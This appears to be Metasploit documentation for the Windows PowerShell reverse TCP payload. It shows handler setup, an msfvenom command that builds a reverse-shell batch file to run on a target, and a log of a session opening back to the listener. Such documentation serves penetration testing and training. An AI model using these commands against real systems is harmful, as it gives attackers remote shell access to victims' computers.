54 lines
1.3 KiB
Markdown
54 lines
1.3 KiB
Markdown
|
## Vulnerable Application
|
||
|
|
|
||
|
|
This powershell payload is suitable for the following environments:
|
||
|
|
|
||
|
|
* Windows 7
|
||
|
|
* Windows Server 2012
|
||
|
|
* Windows 10
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. Do: `use exploit/multi/handler`
|
||
|
|
2. Do: `set payload cmd/windows/powershell_reverse_tcp`
|
||
|
|
2. Do: `set LHOST [IP]`
|
||
|
|
3. Do: `set LPORT [PORT]`
|
||
|
|
4. Do: `run`
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
### Generating a batch file with msfvenom
|
||
|
|
|
||
|
|
```
|
||
|
|
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.0.2 LPORT=4444 -o powershell_reverse_tcp.bat
|
||
|
|
```
|
||
|
|
|
||
|
|
The output batch file can be executed directly on the target, or pasted as a command.
|
||
|
|
|
||
|
|
### Example usage on Windows 7 target
|
||
|
|
|
||
|
|
```
|
||
|
|
msf6 > use exploit/multi/handler
|
||
|
|
[*] Using configured payload generic/shell_reverse_tcp
|
||
|
|
msf6 exploit(multi/handler) > set payload cmd/windows/powershell_reverse_tcp
|
||
|
|
payload => cmd/windows/powershell_reverse_tcp
|
||
|
|
msf6 exploit(multi/handler) > set LHOST 192.168.0.2
|
||
|
|
LHOST => 192.168.0.2
|
||
|
|
msf6 exploit(multi/handler) > set LPORT 4444
|
||
|
|
LPORT => 4444
|
||
|
|
msf6 exploit(multi/handler) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 192.168.0.2:4444
|
||
|
|
[*] Powershell session session 1 opened (192.168.0.2:4444 -> 192.168.0.2:49106 ) at 2021-11-02 12:28:28 +0000
|
||
|
|
|
||
|
|
User @ USER-PC
|
||
|
|
PS C:\Users\User> exit
|
||
|
|
[*] 192.168.0.2 - Powershell session session 1 closed.
|
||
|
|
```
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
### LOAD_MODULES
|
||
|
|
|
||
|
|
A list of powershell modules (separated by a commas) to download.
|
||
|
|
|